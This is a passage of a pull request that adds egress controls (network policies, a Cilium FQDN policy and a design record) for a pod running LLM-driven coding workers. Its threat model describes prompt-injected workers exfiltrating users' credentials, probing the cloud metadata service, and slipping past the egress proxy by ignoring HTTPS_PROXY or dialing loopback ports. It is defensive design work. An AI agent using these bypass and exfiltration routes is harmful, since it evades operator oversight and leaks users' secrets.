### PR TITLE
feat(langy): PR3/4 — Egress enforcement: monitor first, enforce last (ADR-043)

### DIFF
--- a/charts/langyagent/README.md
+++ b/charts/langyagent/README.md
@@ -67,6 +67,9 @@ helm install langyagent ./charts/langyagent -n langwatch -f values.prod.yaml
 | `resources`                   | Pod CPU/memory requests + limits                                        |
 | `networkPolicy.ingressFrom`   | Which pods may call the agent (default: `app.kubernetes.io/name: langwatch`) |
 | `networkPolicy.allowExternalHttps` | Allow egress :443 to anywhere (OpenCode update/telemetry); tighten once pinned |
+| `networkPolicy.privateExcept` / `privateExceptV6` | Private/link-local/CGNAT CIDRs carved out of the `:443`-to-anywhere rule so a worker cannot pivot to internal services. Includes `100.64.0.0/10` (EKS CGNAT). Append your cluster's CIDR if it lives outside RFC1918 |
+| `egress.fqdnFloor` / `requireTls` / `enforceFloor` / `sniCrossCheck` / `cilium.enabled` | ADR-043 per-worker L7 egress adapter: operator FQDN floor + enforcement toggles. Stock posture is monitor-only; `cilium.enabled` ships a bypass-proof datapath `toFQDNs` policy |
+| `nodeSelector` / `affinity` / `tolerations` | Node placement. Opt-in **public-subnet** pinning is a defence-in-depth wall (a node with no route to private RDS/ElastiCache). Needs a Terraform-side node group; see Network policy below |
 
 ## Probes
 
@@ -102,7 +105,33 @@ scale-downs would hang forever. Only enable it after you have raised
 ## Network policy
 
 `networkPolicy.enabled: true` by default. Ingress admits only pods matching
-`networkPolicy.ingressFrom` (the control plane). Egress allows DNS, the
-control plane (`controlPlanePort`), the AI gateway (`gatewayPort`), and —
-unless you set `allowExternalHttps: false` — `:443` to anywhere. Adjust the
-selectors if your `langwatch-app` pod labels differ from the defaults.
+`networkPolicy.ingressFrom` (the control plane). Egress is default-deny and
+allows only: DNS, the control plane (`controlPlanePort`), the AI gateway
+(`gatewayPort`), and — only when `allowExternalHttps: true` — `:443` to
+anywhere. Adjust the selectors if your `langwatch-app` pod labels differ.
+
+**`:443` public egress and the private carve-outs.** `allowExternalHttps` is
+`false` by default; enable it only when workers must `git clone` / call `gh` /
+`npm install`. When enabled, the `:443` rule denies `networkPolicy.privateExcept`
+(v4) and `networkPolicy.privateExceptV6` (v6) so a compromised worker cannot use
+public egress to reach internal services on `:443`. The v4 defaults include
+`100.64.0.0/10` (RFC 6598 CGNAT) because EKS *custom networking* / secondary
+CIDRs place pods — and sometimes nodes and the apiserver ENI — in that range,
+which the RFC1918 ranges do NOT cover. **If your service CIDR or a VPC CIDR lives
+outside RFC1918, append it to `privateExcept`.** The metadata service over plain
+`:80` (IMDSv2) is denied by default-deny — there is no `:80` egress rule at all.
+
+**FQDN egress (ADR-043).** FQDN bounding ("only github/npm/…") is enforced at L7
+by the per-worker egress adapter (worker tools egress via `HTTPS_PROXY`), tuned
+by `egress.*`. For bypass-proof datapath FQDN egress on a Cilium CNI, set
+`egress.cilium.enabled: true` (renders a `CiliumNetworkPolicy` enforcing the same
+`egress.fqdnFloor`); the non-Cilium equivalent is the ADR-033 Fix B per-worker
+netns.
+
+**Defence-in-depth: public-subnet placement (opt-in).** Because workers run
+LLM-driven arbitrary shell, you can pin the pod to a node group whose subnet has
+no route to the private data tier (RDS/ElastiCache/internal ALBs) via
+`nodeSelector` + `tolerations`. Then even a full NetworkPolicy + gVisor bypass
+leaves the node unable to reach private services. This needs a matching public
+node group provisioned in the Terraform/EKS repo (labelled + tainted); the chart
+only selects and tolerates it. See the commented example in `values.yaml`.

--- a/charts/langyagent/templates/ciliumnetworkpolicy.yaml
+++ b/charts/langyagent/templates/ciliumnetworkpolicy.yaml
@@ -1,0 +1,52 @@
+{{- if .Values.egress.cilium.enabled }}
+# Optional bypass-proof FQDN egress (ADR-043 rung 3, "Where FQDN enforcement
+# lives"). The per-worker L7 egress adapter is authoritative for COOPERATING
+# clients but, within one pod netns, a prompt-injected worker can ignore
+# HTTPS_PROXY and connect() straight to an external IP:443 — the adapter cannot
+# force traffic through itself, and under gVisor there is no iptables REDIRECT
+# to make it mandatory. Where the operator runs the Cilium CNI, this
+# CiliumNetworkPolicy enforces the SAME FQDN floor at the datapath, which a
+# worker cannot bypass. The adapter and this policy enforce the same set: the
+# adapter is the CNI-agnostic default; this is the mandatory-enforcement upgrade.
+# The non-Cilium equivalent is the ADR-033 Fix B per-worker netns.
+#
+# NOTE: this enforces the OPERATOR FLOOR only. Per-project customer allow-lists
+# are L7 policy resolved per request (Project.langyEgressAllowlist) and are not
+# expressible as a static CNI policy — they remain adapter-enforced.
+apiVersion: cilium.io/v2
+kind: CiliumNetworkPolicy
+metadata:
+  name: {{ include "langyagent.fullname" . }}-egress-fqdn
+  labels: {{- include "langyagent.labels" . | nindent 4 }}
+spec:
+  endpointSelector:
+    matchLabels: {{- include "langyagent.selectorLabels" . | nindent 6 }}
+  egress:
+    # DNS must be allowed AND visible to Cilium so toFQDNs can learn the
+    # IP↔FQDN mapping it enforces on. Without this rule the FQDN match never
+    # populates and all external egress is dropped.
+    - toEndpoints:
+        - matchLabels:
+            k8s:io.kubernetes.pod.namespace: kube-system
+            k8s-app: kube-dns
+      toPorts:
+        - ports:
+            - port: "53"
+              protocol: UDP
+            - port: "53"
+              protocol: TCP
+          rules:
+            dns:
+              - matchPattern: "*"
+    # The operator FQDN floor: only these hosts may be reached on :443. Kept in
+    # sync with egress.fqdnFloor (the adapter's floor) so both layers enforce
+    # the same set.
+    - toFQDNs:
+        {{- range .Values.egress.fqdnFloor }}
+        - matchName: {{ . | quote }}
+        {{- end }}
+      toPorts:
+        - ports:
+            - port: "443"
+              protocol: TCP
+{{- end }}

--- a/charts/langyagent/templates/configmap.yaml
+++ b/charts/langyagent/templates/configmap.yaml
@@ -24,3 +24,11 @@ data:
   LANGY_MAX_WORKERS: {{ .Values.manager.maxWorkers | quote }}
   LANGY_WORKER_IDLE_MS: {{ .Values.manager.workerIdleMs | quote }}
   LANGY_READINESS_TIMEOUT_MS: {{ .Values.manager.readinessTimeoutMs | quote }}
+  # Egress enforcement (ADR-043). The FQDN floor is the operator-owned
+  # always-allowed set; the toggles gate the enforcement rungs. Per-project
+  # customer allow-lists do NOT live here — they ride the per-request
+  # credentials envelope (Project.langyEgressAllowlist).
+  LANGY_EGRESS_FQDN_FLOOR: {{ join "," .Values.egress.fqdnFloor | quote }}
+  LANGY_EGRESS_REQUIRE_TLS: {{ .Values.egress.requireTls | quote }}
+  LANGY_EGRESS_ENFORCE_FLOOR: {{ .Values.egress.enforceFloor | quote }}
+  LANGY_EGRESS_SNI_CROSSCHECK: {{ .Values.egress.sniCrossCheck | quote }}

--- a/charts/langyagent/templates/deployment.yaml
+++ b/charts/langyagent/templates/deployment.yaml
@@ -43,6 +43,12 @@ spec:
       annotations:
         checksum/config: {{ include (print $.Template.BasePath "/configmap.yaml") . | sha256sum }}
     spec:
+      # The manager makes zero kube-apiserver calls, so the auto-mounted
+      # default-ServiceAccount token is pure attack surface: it is projected
+      # at /var/run/secrets/kubernetes.io/serviceaccount/token (mode 0644),
+      # readable by the worker UID, and never used. Drop it so a compromised
+      # opencode worker cannot read a namespace identity off disk.
+      automountServiceAccountToken: false
       securityContext: {{- toYaml .Values.podSecurityContext | nindent 8 }}
       # Give the manager time to drain workers on SIGTERM (it kills each
       # OpenCode subprocess in its shutdown handler).

--- a/charts/langyagent/templates/networkpolicy.yaml
+++ b/charts/langyagent/templates/networkpolicy.yaml
@@ -78,28 +78,42 @@ spec:
         - protocol: TCP
           port: {{ .Values.networkPolicy.gatewayPort }}
     {{- if .Values.networkPolicy.allowExternalHttps }}
-    # External HTTPS (OpenCode update/telemetry, etc.). Loosen/tighten here.
+    # External HTTPS (OpenCode update/telemetry, git/gh/npm over :443). This is
+    # the pod's ONLY route to the public internet, and the most dangerous rule
+    # in the policy — it is off by default (allowExternalHttps=false).
     #
-    # ipBlock `except` denies the standard private ranges so a compromised
-    # OpenCode subprocess (RCE via prompt injection, supply-chain, etc.)
-    # cannot use this public-egress rule to reach internal services on :443
-    # — the kube apiserver, sidecar containers on the same node, neighbor
-    # pods, or the cloud metadata service (169.254.169.254, classic SSRF
-    # target for IAM credential theft). Legitimate cluster-internal traffic
-    # (the gateway, DNS) is allowed via explicit podSelector rules above.
+    # ADR-043: FQDN bounding ("only github/npm/…") is enforced at L7 by the
+    # per-worker egress adapter (worker tools egress via HTTPS_PROXY), NOT here —
+    # L3/L4 policy cannot express FQDN egress. This rule stays the coarse
+    # backstop; for bypass-proof datapath FQDN egress enable
+    # `egress.cilium.enabled`.
+    #
+    # The ipBlock `except` lists (networkPolicy.privateExcept / privateExceptV6)
+    # deny the private + link-local + CGNAT ranges so a compromised OpenCode
+    # subprocess (RCE via prompt injection, supply chain) cannot use this
+    # public-egress rule to reach internal services on :443 — the kube
+    # apiserver, sidecars on the same node, neighbour pods (INCLUDING the
+    # RFC 6598 100.64/10 CGNAT range EKS custom-networking uses for pods/nodes),
+    # or the cloud metadata service (169.254.169.254, classic SSRF -> IAM
+    # credential theft). Legitimate cluster-internal traffic (gateway, control
+    # plane, DNS) is allowed via the explicit podSelector rules above.
+    #
+    # NOTE :80 is intentionally NOT allowed anywhere in this policy, so IMDSv2
+    # over http://169.254.169.254 (port 80) is denied by default-deny regardless
+    # of the list below. Keep it that way.
     - to:
         - ipBlock:
             cidr: 0.0.0.0/0
             except:
-              - 10.0.0.0/8
-              - 172.16.0.0/12
-              - 192.168.0.0/16
-              - 169.254.0.0/16
+              {{- range .Values.networkPolicy.privateExcept }}
+              - {{ . }}
+              {{- end }}
         - ipBlock:
             cidr: ::/0
             except:
-              - fd00::/8
-              - fe80::/10
+              {{- range .Values.networkPolicy.privateExceptV6 }}
+              - {{ . }}
+              {{- end }}
       ports:
         - protocol: TCP
           port: 443

--- a/charts/langyagent/values.yaml
+++ b/charts/langyagent/values.yaml
@@ -198,13 +198,115 @@ networkPolicy:
   # driven arbitrary shell with the user's API key + GitHub user-to-server
   # token in env, so default-on egress IS the most dangerous posture (a
   # prompt-injection can curl creds to attacker-controlled IPs). Private
-  # ranges + the cloud metadata service are blocked above regardless, but
+  # ranges + the cloud metadata service are blocked below regardless, but
   # operators who actually need PR-opening / git-clone must opt in
   # explicitly here. Sergio's 2026-06-30 review round 3.
+  #
+  # ADR-043 rung 4: this `0.0.0.0/0:443` rule is the L3/L4 backstop. FQDN
+  # bounding ("only github/npm/…") is NOT expressible at L3/L4 and is instead
+  # enforced at L7 by the per-worker egress adapter (see `egress` below), which
+  # is now the SOLE egress path for workers (their tools egress via HTTPS_PROXY).
+  # Because the adapter shares the pod netns with the workers, this rule cannot
+  # be narrowed by podSelector to "only the adapter" — L4 can't tell adapter
+  # bytes from worker bytes. Operators who need bypass-proof FQDN egress enable
+  # `egress.cilium.enabled` below (a datapath `toFQDNs` policy) or the ADR-033
+  # Fix B per-worker netns; both enforce the SAME floor the adapter does.
   allowExternalHttps: false
+  # Internal / private IP ranges CARVED OUT of the `:443`-to-anywhere rule
+  # (which is rendered only when allowExternalHttps=true). A compromised worker
+  # (RCE via prompt injection / supply chain) must not use that public-egress
+  # rule to pivot onto internal services on :443 — the kube-apiserver, neighbour
+  # pods, node kubelet, sidecars, or the cloud metadata service
+  # (169.254.169.254, classic SSRF -> IAM credential theft). These `except`
+  # entries also close the DNS-rebinding vector: an attacker hostname that
+  # re-resolves to an internal IP is dropped by IP, not admitted by name.
+  # Legitimate cluster-internal traffic (control plane, gateway, DNS) uses the
+  # explicit podSelector rules above and is unaffected by this list.
+  #
+  # The :80 (plaintext) side: there is deliberately NO :80 egress rule anywhere
+  # in this policy, so IMDSv2 over http://169.254.169.254 (port 80) is denied by
+  # DEFAULT-DENY, independently of this list. Do NOT add a broad :80 egress rule
+  # without re-adding 169.254.0.0/16 protection there too.
+  #
+  # Operators on a non-standard topology (a service CIDR outside RFC1918, extra
+  # VPC CIDRs) APPEND their ranges here — the template iterates the list.
+  privateExcept:
+    - 10.0.0.0/8          # RFC1918 (covers the EKS default service CIDR 10.100/16)
+    - 172.16.0.0/12       # RFC1918 (covers the EKS default service CIDR 172.20/16)
+    - 192.168.0.0/16      # RFC1918
+    - 169.254.0.0/16      # link-local + cloud metadata (169.254.169.254)
+    - 100.64.0.0/10       # RFC 6598 CGNAT — EKS "custom networking" / secondary
+                          # CIDR places PODS (and sometimes NODES + the apiserver
+                          # ENI) here; NOT covered by RFC1918, so it MUST be
+                          # excluded or a worker reaches neighbours on :443.
+  privateExceptV6:
+    - fd00::/8            # unique-local (incl. IPv6 metadata fd00:ec2::254)
+    - fe80::/10           # link-local
+
+# Egress enforcement (ADR-043) — the per-worker L7 egress adapter. Monitor
+# first, enforce last: the default posture is monitor-only. These map to the
+# manager's LANGY_EGRESS_* env via the ConfigMap.
+egress:
+  # OPERATOR FLOOR, NOT CUSTOMER POLICY. The always-allowed structural
+  # destinations Langy needs regardless of any per-project allow-list
+  # (floor ∪ customer-list). Only make this a hard ceiling (enforceFloor) once
+  # monitoring has proven this set is complete for your install. The gateway +
+  # control plane already have their own explicit egress rules and are
+  # NO_PROXY'd, so this list is the external hosts the workers structurally
+  # reach.
+  fqdnFloor:
+    - github.com
+    - api.github.com
+    - codeload.github.com
+  # rung 1a: refuse cleartext forwards and non-:443 CONNECTs. Always-safe
+  # (worker egress is HTTPS already); on by default.
+  requireTls: true
+  # rung 3 lever: make the floor a HARD CEILING for projects that set no
+  # allow-list. OFF by default — the stock posture stays monitor-only so an
+  # install that configures nothing upgrades into watching, not blocking. Flip
+  # ON per install only after reading the monitoring.
+  enforceFloor: false
+  # Peek the TLS ClientHello SNI as an anti-domain-fronting cross-check of the
+  # CONNECT authority. Cheap; on by default.
+  sniCrossCheck: true
+  # Optional bypass-proof upgrade: a Cilium CiliumNetworkPolicy with `toFQDNs`
+  # enforces the SAME floor at the datapath, which a worker cannot bypass by
+  # ignoring HTTPS_PROXY. Requires the Cilium CNI. The stock default is the
+  # cooperative adapter + monitored bypass (ADR-043 "honest limit"); this is the
+  # opt-in mandatory-enforcement path. The non-Cilium equivalent is the ADR-033
+  # Fix B per-worker netns.
+  cilium:
+    enabled: false
 
 nameOverride: ""
 fullnameOverride: ""
+
+# Node placement for the agent pod. Rendered by deployment.yaml only when set;
+# empty (the default) keeps existing behaviour — the scheduler places the pod on
+# any eligible node.
+#
+# DEFENCE-IN-DEPTH — public-subnet placement (opt-in). This pod runs LLM-driven
+# arbitrary shell (worker RCE is in-scope). Pinning it to a node group whose
+# subnet has NO route to private RDS / ElastiCache / internal ALBs means that
+# even if the NetworkPolicy AND gVisor are both bypassed, the node itself cannot
+# reach the private data tier — the network topology becomes the last-resort
+# wall. The public subnet still egresses to the internet (via an internet
+# gateway) for git/gh/npm; the point is it has no private-subnet return route.
+#
+# This requires infra-side setup that lives in the Terraform/EKS repo, NOT this
+# chart: a dedicated managed node group in the PUBLIC subnet, labelled (e.g.
+# langwatch.ai/workload=langy-public) and tainted so only this pod lands there.
+# The chart's job is only to select+tolerate that node group. Example:
+#
+#   nodeSelector:
+#     langwatch.ai/workload: langy-public
+#   tolerations:
+#     - key: langwatch.ai/workload
+#       operator: Equal
+#       value: langy-public
+#       effect: NoSchedule
+#
+# Prefer nodeSelector for a hard pin; use affinity for soft/weighted rules.
 nodeSelector: {}
 affinity: {}
 tolerations: []

--- a/dev/docs/adr/043-langy-egress-enforcement.md
+++ b/dev/docs/adr/043-langy-egress-enforcement.md
@@ -1,0 +1,351 @@
+# ADR-043: Langy egress enforcement — monitor first, enforce last
+
+**Date:** 2026-07-10
+
+**Status:** Draft
+
+> **This is the PR4-of-4 design in the Langy egress-hardening series.** It is
+> deliberately docs-only and **blocked on PR3**: it builds the enforcement rungs
+> on top of the egress instrumentation seam (PR1) and the monitor-only telemetry
+> (PR3). Nothing here should be implemented until PR3's seam is merged and has
+> observed real traffic — the whole thesis is "let monitoring prove what's
+> legitimate before anything blocks."
+
+## Context
+
+The `langyagent` pod runs many `opencode` workers as subprocesses. Each worker
+holds a different user's **live** credentials in its environment — the project's
+LangWatch API key, an AI-gateway virtual key, and (when connected) a GitHub
+user-to-server token — and it executes LLM-generated shell. A prompt-injected
+worker is therefore a realistic attacker, and the single highest-value action
+that attacker can take is **outbound exfiltration**: `curl` the secrets it holds,
+or the customer's trace/PII data it can read via MCP, to an attacker-controlled
+host.
+
+Two prior decisions bound the *pod* but not the *destination*:
+
+- **ADR-033** closed sibling-to-sibling exfiltration (a worker driving another
+  worker's `opencode` control port) with a per-worker `OPENCODE_SERVER_PASSWORD`,
+  and established that **kernel netfilter is unavailable under gVisor** — the pod
+  runs `runtimeClassName: gvisor`, whose Sentry implements no `iptables`/`nftables`
+  in any backend. Any egress control that depends on `iptables` (transparent
+  redirect, OWNER-match DROP, NAT) is off the table in this pod.
+- The chart's NetworkPolicy (`charts/langyagent/templates/networkpolicy.yaml`)
+  is deny-by-default at L3/L4. Its `allowExternalHttps` rule (default **off**;
+  turned **on** for installs that need `git clone` / `gh` / package installs)
+  opens `:443` to `0.0.0.0/0` with RFC-1918 and the cloud metadata service
+  (`169.254.169.254`) carved out. That carve-out stops SSRF into internal
+  services, but the moment `allowExternalHttps` is on, a worker may reach **any
+  public host on :443** — this is the exfiltration hole this series closes.
+
+NetworkPolicy cannot close it by itself: **L3/L4 policy cannot express FQDN
+egress** ("allow github.com, deny everything else") without a CNI that adds a
+DNS-aware datapath (Cilium). `docs/langy-github-app.md §4` already documents this
+limitation. So the L7 controls have to live somewhere the pod actually controls.
+
+The series splits the work so risk lands last:
+
+| PR | Adds | Blocks anything? |
+|----|------|------------------|
+| PR1 | The **egress seam**: a per-worker forward proxy the worker's tools egress through (`HTTPS_PROXY` in the worker env), mirroring the existing per-worker `authProxy` inbound pattern. | No |
+| PR2 | (series scaffolding — credential-envelope + config plumbing) | No |
+| PR3 | **Monitoring** on the seam: every outbound `CONNECT` is observed, attributed to a worker/conversation, and emitted as telemetry; anomalies are flagged. Observe → detect → flag. | **No — nothing is denied.** |
+| **PR4 (this ADR)** | **Enforcement** rungs on top: require-TLS + per-destination throttle, the **customer allow-list**, an always-on FQDN floor, and retirement of the superseded direct-egress path. | Yes — but default posture stays monitor-only. |
+
+## Decision
+
+We add an **enforcement ladder** to the egress adapter, climbed in the order
+monitoring earned. Each rung is independently shippable behind config, and the
+**default posture after PR4 is still monitor-only** — enforcement that could
+break a customer's legitimate workflow is opt-in, and enforcement that is
+always-on is scoped to destinations monitoring already proved are the only
+legitimate ones.
+
+### Rung 0 (inherited from PR3): always-on monitoring
+
+Every outbound flow is observed and attributed. Nothing below removes this
+floor; every deny/throttle/flag **also** emits the same telemetry, so an
+enforced deny is a *monitored* deny. This is what makes "flag it" and "block it"
+the same event with a different verb.
+
+### Rung 1: require TLS + per-destination throttle
+
+At the L7 adapter:
+
+1. **Require TLS.** The adapter only proxies opaque `CONNECT host:443` tunnels.
+   It refuses to forward cleartext `http://` requests to external hosts. A
+   worker that tries to exfiltrate over plaintext HTTP to a public host is
+   denied at the seam (the destination never sees the bytes). Loopback and the
+   in-cluster control-plane/gateway paths are unaffected (they have their own
+   explicit rules; see "Legitimate paths" below).
+2. **Per-destination throttle.** The adapter cannot see inside TLS, so the
+   throttle is on the *shape* of the flow, not its content: new-connection rate
+   and bytes-transferred **per destination host, per worker**. A worker opening
+   a burst of connections to a rare host, or streaming a large volume to one
+   destination — the classic exfiltration signature — is throttled (slowed, then
+   tar-pitted) rather than hard-denied. Throttle is a *soft* rung on purpose: it
+   degrades a suspicious flow without a false-positive cliff, and it always
+   flags (rung 0) so an operator sees it.
+
+### Rung 2: customer-configurable allow-list (the crux)
+
+**Enforcement is the customer's policy, not ours.** Each project may set an
+optional allow-list of hosts Langy's workers may reach. The semantics are the
+whole point:
+
+- **No allow-list set → monitor only.** Every destination is *observed and
+  flagged* (rung 0) but **nothing is blocked** on allow-list grounds. This is the
+  default. A customer who does nothing gets watching, not breakage.
+- **Allow-list set → restrict to it.** Every host on the list is allowed;
+  **every other host is denied** and flagged. The customer has opted in to
+  enforcement, and the enforcement is exactly the set they declared they trust.
+
+An allow-list ("hosts I trust") is a cleaner mental model than a deny-list
+("hosts I fear") — it is finite, it composes with the always-on monitoring
+beneath (the monitor tells you what to *add* to the list), and its default of
+"unset = watch" is safe. A deny-list's default of "unset = allow-all" is not,
+and a deny-list can never be complete.
+
+### Rung 3: FQDN-bounded floor (always-on, once proven)
+
+Independently of the customer's allow-list, the adapter enforces a small,
+operator-controlled **floor** of the destinations Langy structurally needs:
+`github.com` / `api.github.com` / `codeload.github.com` (PR-opening), the AI
+gateway, and the LangWatch control plane. This floor is the last rung because it
+is only safe to make always-on **after monitoring (PR3) has proven this is
+actually the complete set of legitimate destinations** — turning it on before
+that risks silently breaking a real workflow nobody knew existed. The floor and
+the customer allow-list compose: the effective allow set is `floor ∪
+customer-list`; when the customer sets no list, the floor is still enforced but
+everything else is monitor-only (the floor is a floor, not a ceiling).
+
+### Rung 4: drop the legacy synchronous egress path
+
+Once the seam is the sole egress path, the direct worker-to-internet path it
+superseded is removed: the worker env no longer offers unproxied egress, and the
+broad `allowExternalHttps` `0.0.0.0/0:443` NetworkPolicy rule is narrowed to
+"the adapter's own upstream," so the L3/L4 backstop and the L7 adapter agree on
+one chokepoint. This rung lands last because it is only safe once rungs 1-3 have
+been observed working in production against real traffic.
+
+## Where FQDN enforcement lives
+
+**In the Go egress adapter, at L7 — not in NetworkPolicy, and not requiring a
+particular CNI.** The adapter terminates the worker's `CONNECT github.com:443`
+and reads the FQDN **directly out of the CONNECT authority** (and, as a
+cross-check, the TLS SNI). That is the only place in this pod where an FQDN is
+observable without netfilter, which ADR-033 established is dead under gVisor.
+NetworkPolicy stays exactly as it is: the coarse L3/L4 backstop with the RFC-1918
++ metadata carve-out. It is not asked to do FQDN, because it cannot.
+
+**Honest limit — the L7 adapter is cooperative, not mandatory, in the stock
+pod.** Within one pod netns, nothing at L3/L4 forces a worker's traffic *through*
+the loopback proxy: a prompt-injected worker can ignore `HTTPS_PROXY` and
+`connect()` straight to an external `IP:443`, because the pod-level NetworkPolicy
+still permits `:443` egress (it must — the proxy itself egresses there, and L4
+can't tell proxy bytes from worker bytes). Under gVisor we cannot `iptables
+REDIRECT` worker traffic into the proxy. So the adapter's FQDN/allow-list/TLS
+enforcement is authoritative for **cooperating** clients and is the primary
+mechanism; the **bypass path is not blocked but it is still *seen*** — PR3's
+monitoring must be at the flow level (VPC flow logs / a CNI flow layer), not
+only at the proxy, precisely so a direct-IP bypass is observed and flagged even
+when it isn't blocked. Two optional floors make enforcement *mandatory* for
+operators who need it, and the ADR recommends them without hard-requiring either:
+
+- **Preferred: a Cilium FQDN egress policy at the CNI.** Where the operator runs
+  Cilium, a `CiliumNetworkPolicy` with `toFQDNs` enforces the same allow set in
+  the datapath, which a worker cannot bypass. The adapter and the CNI policy
+  enforce the *same* list; the adapter is the CNI-agnostic default, the Cilium
+  policy is the bypass-proof upgrade.
+- **Fallback: the ADR-033 "Fix B" per-worker netns.** Put each worker in its own
+  network namespace whose only route out is the adapter's veth. ADR-033 validated
+  this works under gVisor (needs `CAP_SYS_ADMIN`) and named the missing piece —
+  "egress without NAT needs a userspace forward proxy over the veth" — which *is*
+  this adapter. So if a customer needs bypass-proof enforcement without Cilium,
+  Fix B + this adapter is the combination, at the cost of the broader capability.
+
+## Where the allow-list config lives
+
+**A per-project setting, resolved by the control plane and threaded into the
+existing per-request credentials envelope** — never a hardcoded list, never a
+chart value (which would be per-install, not per-project).
+
+This mirrors the model-allow-list precedent exactly. Today
+`LangyCredentialService.getModelsAllowed()` reads a project's `modelsAllowed`
+and `langy.ts` enforces it server-side as defense-in-depth before dispatch
+(`langwatch/src/server/routes/langy.ts:389-409`). The egress allow-list follows
+the same shape, with one deliberate divergence:
+
+- **Home: a project-level Langy egress policy, not the virtual key's config.**
+  `modelsAllowed` lives on the `VirtualKey` because the *gateway* is its
+  enforcement point and the VK is the gateway's unit of policy. The egress
+  allow-list's enforcement point is the *agent pod's egress adapter*, not the
+  gateway — putting it on the VK would be a category error. It is a Langy
+  project network policy, so it lives with the project (a nullable
+  `Project.langyEgressAllowlist` JSON column, or a small `LangyEgressPolicy`
+  row keyed by `projectId` — PR4 picks one; the plan proposes the column for
+  parity with the existing per-project Langy fields).
+- **Resolution: `LangyCredentialService.getEgressAllowlist({ projectId })`**,
+  returning `string[] | null`. `null`/empty ⇒ monitor-only (rung 2 default);
+  non-empty ⇒ the enforced set. Same `null-means-watch` convention as
+  `getModelsAllowed`.
+- **Transport: the credentials envelope.** `LangyCredentials` gains
+  `egressAllowlist?: string[]`; the Go `Credentials` struct
+  (`services/langyagent/adapters/workerpool/worker.go`) gains the matching `egressAllowlist` field.
+  It rides the same per-`/chat` path every other capability rides — no second
+  channel. Because a worker is per-conversation and capabilities are bound at
+  spawn (the `CredentialSignature` pattern), the allow-list is bound at spawn
+  too: a change to the project's list recycles the worker on its next turn, so a
+  live worker never silently runs under a stale policy. The per-worker egress
+  adapter is constructed with that worker's list, exactly as `startAuthProxy` is
+  constructed with that worker's password.
+- **The presence of the list is the mode.** No separate `egressMode` enum: an
+  absent/empty list *is* monitor-only and a non-empty list *is* enforce. This is
+  the whole "default watch, opt-in to restrict" decision expressed as one field,
+  and it keeps the envelope minimal.
+
+## Rationale / trade-offs
+
+- **Why monitor-first, enforce-last.** The failure mode of premature egress
+  enforcement is a silently broken customer workflow (a package registry, a
+  private git host, an internal API the customer legitimately reaches) with no
+  data to tell you it was legitimate. Monitoring first turns "I think this is
+  the allow set" into "here is the observed allow set," so every block is a
+  block of something we watched not being used. It also lets a customer read
+  their own traffic before deciding to enforce, which is what makes the
+  allow-list *theirs*.
+- **Why customer-owned allow-list, not a LangWatch-owned deny-list.** We do not
+  know a given customer's legitimate destinations — their internal hosts, their
+  registries, their git remotes. A deny-list we maintain is both incomplete
+  (misses their attacker) and wrong (blocks their internal host). An allow-list
+  they own is complete *for their environment* by construction, and the default
+  of "unset = watch" means we never break an install that hasn't opted in.
+- **Trade-off accepted: cooperative L7 enforcement has a bypass in the stock
+  pod.** We accept this because (a) the bypass is *monitored*, not invisible;
+  (b) the honest alternative — mandatory enforcement — costs either a CNI
+  dependency (Cilium) or the broader `CAP_SYS_ADMIN` + per-worker netns of
+  ADR-033 Fix B, neither of which every operator wants; and (c) we surface both
+  as documented upgrades. Pretending L3/L4 policy can FQDN-block, or that the
+  loopback proxy is unbypassable, would be the worse outcome.
+- **Trade-off accepted: throttle is heuristic.** Byte/connection-rate signatures
+  are not proof of exfiltration; they can false-positive on a legitimate large
+  clone. That is exactly why throttle *slows and flags* rather than hard-denies,
+  and why the hard-deny rung (allow-list) is customer-scoped.
+
+## Consequences
+
+- **Config surface.** A new per-project `langyEgressAllowlist` (nullable) and a
+  `LangyCredentialService.getEgressAllowlist` resolver; `LangyCredentials` and
+  the Go `Credentials` struct each gain `egressAllowlist?: string[]`. `langy.ts`
+  threads it into the envelope, alongside the existing model/GitHub plumbing.
+- **Egress adapter.** The PR1 adapter gains, per rung: a TLS-required guard, a
+  per-destination throttle, an allow-list matcher (host + the always-on floor),
+  and the FQDN read from the CONNECT authority. All four *also* emit PR3's
+  telemetry, so every enforcement action is a monitored event.
+- **Chart.** `charts/langyagent`: the always-on floor becomes a values list
+  (`networkPolicy.egressFqdnFloor` / adapter config), documented as "operator
+  floor, not customer policy." The broad `allowExternalHttps: 0.0.0.0/0:443`
+  rule is narrowed to the adapter's upstream once rung 4 lands. Optional Cilium
+  `CiliumNetworkPolicy` with `toFQDNs` shipped as an opt-in template for
+  bypass-proof installs; ADR-033 Fix B referenced as the non-Cilium bypass-proof
+  fallback.
+- **Docs.** `docs/langy-github-app.md §4` (which already flags the L3/L4 FQDN
+  limitation and names Cilium) is updated to point at the adapter as the primary
+  FQDN enforcement point and this ADR as the design.
+- **No new user-facing breakage by default.** Because default posture stays
+  monitor-only, an existing install upgrades into *watching*, not *blocking*.
+  Blocking begins only when a customer sets an allow-list, or when an operator
+  turns on the FQDN floor / rung 4 after reading their monitoring.
+- **Hard dependency on PR3.** None of PR4 is safe to build or merge before PR3's
+  monitoring seam exists and has observed real traffic — the enforcement rungs
+  are defined *relative to* what monitoring proved legitimate. This ADR exists so
+  PR4 is a fast-follow the moment PR3 lands.
+
+## Decision: worker→manager hard network isolation (Fix B)
+
+This section records the **enforcement target** for the one gap the L7 egress
+adapter above cannot close by itself. It is a **design/decision, not implemented
+in this PR** — the adapter + NetworkPolicy + the applied hardening are the
+interim posture; this is the mandatory-enforcement end state.
+
+### Finding (F1): same-netns loopback reachability
+
+Workers are subprocesses inside the **manager's pod network namespace**. That
+means `127.0.0.1:<manager-port>` (the `/chat` control listener) and the sibling
+per-worker authproxy / opencode ports are **loopback-reachable from any worker**.
+A NetworkPolicy operates at L3/L4 on pod-to-pod / pod-to-CIDR traffic; it **cannot
+filter same-netns loopback**, so no NetworkPolicy (nor the Cilium `toFQDNs`
+policy, nor the CGNAT carve-out) constrains a worker dialing the manager or a
+sibling on `127.0.0.1` / the pod IP. Today the manager↔worker boundary is held
+**by AUTH only** — the internal service secret is stripped from the worker's env
+(`sensitiveEnvPattern` in
+`services/langyagent/adapters/workerpool/worker.go`), so a worker that reaches
+`/chat` gets a `401`. That is a real control, but it is a **single, fragile
+layer**: any future code path that leaks the secret into the worker env, or any
+manager endpoint that doesn't check it, re-opens the hole.
+
+### Decision
+
+Give each worker its **own network namespace** and route its egress through a
+**manager-run CONNECT forward proxy**:
+
+- **Per-worker netns.** `unshare(CLONE_NEWNET)` for the worker, joined to the
+  manager by a **veth pair** configured so the manager can reach the worker's
+  opencode control port, but the worker **has no route** to the manager's
+  `/chat` port, the authproxy/opencode ports of siblings, or the pod IP. This
+  makes F1's loopback reachability structurally impossible rather than
